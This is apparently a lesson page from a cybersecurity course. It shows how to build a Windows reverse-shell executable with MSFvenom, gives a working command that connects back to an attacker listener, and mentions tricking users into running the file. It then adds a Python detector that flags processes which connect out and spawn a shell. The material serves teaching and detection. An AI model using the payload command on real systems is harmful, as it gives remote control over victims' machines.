
Generating Reverse Shells with MSFvenom (Tool)

Cyber Security Mastery: From Zero to Hero

MSFvenom: Standalone Payload Generation

While Metasploit handles payloads automatically during exploitation, sometimes you need to generate a standalone malicious executable (e.g., to trick a user into clicking it, or upload it via a file upload vulnerability).

MSFvenom combines the older msfpayload (payload generation) and msfencode (encoding) tools into a single command.

Key Parameters

  • -p: Specify the payload (e.g., linux/x86/shell_reverse_tcp).
  • LHOST and LPORT: The IP address and port of the attacker's listener, which the payload connects back to.
  • -f: Output format (e.g., exe, elf, raw).
  • -o: Output file name.

Example: Creating a Windows Reverse Shell

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o /root/Documents/shell.exe
```

Action Item: After generating this payload, you must set up a corresponding listener (using netcat or Metasploit's multi/handler) to catch the connection when the target executes the file.
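From the defender's side, a reverse shell of this kind leaves a recognizable sequence: a process opens an outbound connection and then spawns a command interpreter as its child. The following is an added example, not part of the course material, that looks for that sequence; the event records, field names and the file name invoice.exe are constructed for illustration and are not a real log format.

```python
# Constructed, simplified process/network telemetry (not a real log format).
EVENTS = [
    {"type": "proc", "pid": 4120, "ppid": 2288, "image": r"C:\Users\alice\Downloads\invoice.exe"},
    {"type": "net", "pid": 4120, "dst": "192.168.1.10", "dport": 4444},
    {"type": "proc", "pid": 4188, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe"},
    {"type": "proc", "pid": 5012, "ppid": 900, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"type": "net", "pid": 5012, "dst": "93.184.216.34", "dport": 443},
    {"type": "proc", "pid": 5100, "ppid": 2288, "image": r"C:\Windows\System32\cmd.exe"},
]

SHELLS = {"cmd.exe", "powershell.exe", "sh", "bash"}
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\", "/tmp/", "/var/www/")

def basename(path):
    """Lower-cased file name for either Windows or POSIX style paths."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def find_reverse_shell_candidates(events):
    """Flag processes that connect out and afterwards spawn a shell as a child."""
    images, outbound, alerts = {}, {}, []
    for ev in events:  # events are assumed to be in chronological order
        if ev["type"] == "net":
            # Remember the first outbound connection per process. The port is
            # recorded but not matched on: LPORT is whatever the attacker chose.
            outbound.setdefault(ev["pid"], (ev["dst"], ev["dport"]))
            continue
        images[ev["pid"]] = ev["image"]
        parent = ev["ppid"]
        if basename(ev["image"]) in SHELLS and parent in outbound:
            parent_image = images.get(parent, "<unknown>")
            dst, dport = outbound[parent]
            alerts.append({
                "parent_pid": parent, "parent_image": parent_image,
                "shell_pid": ev["pid"], "dst": dst, "dport": dport,
                # Running from a user-writable path raises confidence.
                "user_writable": any(d in parent_image.lower() for d in USER_WRITABLE),
            })
    return alerts

if __name__ == "__main__":
    for alert in find_reverse_shell_candidates(EVENTS):
        print(alert)
```

The rule keys on behavior (outbound connection followed by a shell child) rather than on port 4444, so it still fires when a different LPORT is used.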